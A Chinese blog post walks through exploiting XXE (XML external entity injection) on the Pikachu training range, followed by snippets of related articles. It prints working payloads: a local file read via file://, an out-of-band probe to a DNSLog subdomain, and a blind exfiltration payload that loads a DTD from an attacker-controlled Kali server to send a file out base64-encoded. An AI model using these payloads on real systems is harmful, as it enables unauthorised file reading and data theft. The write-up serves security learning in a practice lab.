pikachu靶场之XXE漏洞详解

最新推荐文章于 2024-05-13 10:46:10 发布
最新推荐文章于 2024-05-13 10:46:10 发布
阅读量1.3k 收藏 24
点赞数 22
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxz021202/article/details/136410210
版权
本文详细描述了一次针对XXE(外部实体注入)漏洞的探索过程,涉及有回显和无回显情况,使用BP抓包、URL编码技术,以及利用DNSLogPlatform检测服务器解析能力,并展示了如何通过Kali进行HTTP服务攻击和文件读取。
摘要由CSDN通过智能技术生成

pikachu验证XXE漏洞:分为有回显和无回显;

有回显:

首先尝试用BP抓包:

然后观察请求行、Accept、Content-Type,这里可以从Accept中发现能够接收的文档类型包括xml。

然后构造payload:

<?xml version="1.0"?>

<!DOCTYPE foo [   

<!ENTITY xxe "你真棒!" > ]>

<foo>&xxe;</foo>

如果真的存在xml漏洞,那么这里就会回显“你真棒!”。

但是当我用BP发送payload时却没有成功:

然后重新抓包,抓发送payload时的包:

可以看到是因为payload被URL编码了。

接下来就可以利用这个漏洞来读取服务器下的文件内容,构造payload

<?xml version="1.0"?>

<!DOCTYPE foo [   

<!ENTITY xxe SYSTEM "file:///d:/123.txt"  > ]>

<foo>&xxe;</foo>

这个payload将读取到在D盘下的123.txt文件的内容:

如果用BP发送的话,就要先URL编码:

无回显:

对这个靶场的源文件的输出语句进行注释后,就不会出现回显了:

此时重新发送payload是看不到任何东西的:

当遇到没有回显的情况可以用到这个网站DNSLog Platform。这是个域名解析网站,在这里用来检验目标主机是否能够解析xml的代码。

这个网站会给出一个子域名:

构造payload:

<?xml version="1.0"?>

<!DOCTYPE foo [   

<!ENTITY xxe SYSTEM "http://1zjmu5.dnslog.cn"> ]>

<foo>&xxe;</foo>

只要目标服务器能够解析xml代码就会访问代码中的网址。

上图说明目标主机访问了代码中的网址,那就说明目标主机能够解析xml代码,所以可能存在xxe漏洞。

接着需要用到Kali作为攻击机,首先在Kali中开启HTTP服务:

开启后在本机的浏览器输入Kali的IP就可以连接到服务:

(也可以用这种方式将虚拟机的文件下载到本机,在IP后面加上文件路径就行)

然后在Kali中编辑一个文件xxe.dtd(需要在存在这个文件的目录下开启HTTP服务)

这段代码是用来读取本机中的123.txt文件,马赛克处是Kali的IP。

然后在pikachu靶场中构造payload如下:

<!DOCTYPE convert [

<!ENTITY % remote SYSTEM "http://192.168.153.128/xxe.dtd">

%remote;%int;%send;

]>

这个payload会调用Kali中的xxe.dtd文件。

发送后就可以在Kali中看到记录:

红框中的内容就是123.txt文件经过base64编码后的内容,解码后的结果如下:

文件内容是中文所以显示乱码了。

把文件内容改成英文重来。

末尾的感叹号也是乱码。

至此就完成了对xxe漏洞的利用。

“Script Kid”
关注
  • 22
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XXE(XML外部实体注入)漏洞
weixin_45253622的博客
03-26 444
XXE:“xml external entity injection” 漏洞原理 XXE(XMLExternal Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml2.9以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://和ftp://等协议,导致可加载恶意外部文件和代码,造
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3695
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
pikache靶场通关——XXE
p36273的博客
11-02 222
关卡样式: 输入123,查看结果: 输入123后,显示上图数据,说明这里输入的XML格式错误查看抓取的数据包: 抓到的数据包如上输入的XML格式: 在BP数据包中修改后重发送 发现还是报错。在靶场中输入: 这里发现竟然输入正确了。这其中有什么区别呢?使用BP抓包看一看 这里发现被URL编码了 这里就成功读取到指定的文件内容了。这里需要使用3台机器模拟: 这里地区实现无回显了。 返回DNSLog查看 的确接收到了,这就说明XXE是存在的。 注意:这里的IP地址是写模拟外网接收服务器的IP地
Pikachu 靶场 XXE 通关解析
最新发布
Flag少侠的博客
05-13 1118
XXE漏洞(XML External Entity Injection)是一种安全漏洞,存在于使用XML解析器的应用程序中。攻击者可以利用XXE漏洞来读取服务器上的任意文件、执行远程请求、进行内部端口扫描等操作,甚至可能导致服务器拒绝服务攻击。XXE漏洞的原理是利用应用程序对外部实体的解析支持。XML实体是可以引用外部资源(如文件或URL)的独立实体。当应用程序在解析XML时,如果未正确配置解析器或没有禁用外部实体的引用,攻击者可以构造恶意的XML实体来触发XXE漏洞。]>
PIKACHUXXE
qq_62078839的博客
04-18 779
概述 XXE -"xml external entity injection" 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里
Pikachu-XXE
baynk的博客
11-19 4012
0x00 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从...
pikachu-xxe
m0_62094846的博客
09-19 244
然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题。但是扫描80端口会快,81会慢,因为80端口开放了。点 response received进行排序。在WWW下保存以test.dtd为名的文件。选择 response received。测试一下是否有xxe漏洞,且是否有回显。把echo $html 注释掉。两个回显都是这样的报错信息。填好数据,然后开始爆破。表示出来,再进行排序。
pikachuxxe
qq_43665434的博客
02-19 437
pikachuxxe XML基础知识 参考文章 一、什么是xxeXXE即“xml external entity injection”即“xml外部实体注入漏洞”。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里对应的解析xml的函数默认是禁止解析xml外部实体内容的 就如在php中,对于xml的解析用的是libxml,在libxml版
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu--XXE
firecjh的博客
06-10 290
3)查看PHP源代码。(文件路径以自己实际电脑为准)XXE进入测试页面。
Pikachu系列——XXE
Zlirving_的博客
05-22 1381
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验九 —— XXE XXE概述 xml外部实体注入 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 XML概念 XML是可扩展的标记语言,设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下: XML ----
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-17 6434
一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...
十一、pikachuXXE
qq_55202378的博客
08-25 508
pikachu XXE
PikachuXXE(xml外部实体注入漏洞
莫黎小天
05-26 908
一、XML简介 1.XML 指可扩展标记语言(eXtensible Markup Language)。 XML 被设计用来传输和存储数据。 2.一个 XML 文档实例 <?xml version="1.0" encoding="UTF-8"?> <note> <to>Tove</to> <from>Jani</from> <heading>Reminder</heading> <body>
pikachuXXE漏洞
weixin_51446936的博客
06-18 2002
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
pikachu靶场xxe漏洞
09-07
pikachu靶场xxe漏洞是指在该靶场中存在的XML外部实体攻击漏洞。通过构造恶意内容,攻击者可以利用这个漏洞读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。[1]这个靶场提供了一个接收XML数据的API...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

“Script Kid”

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值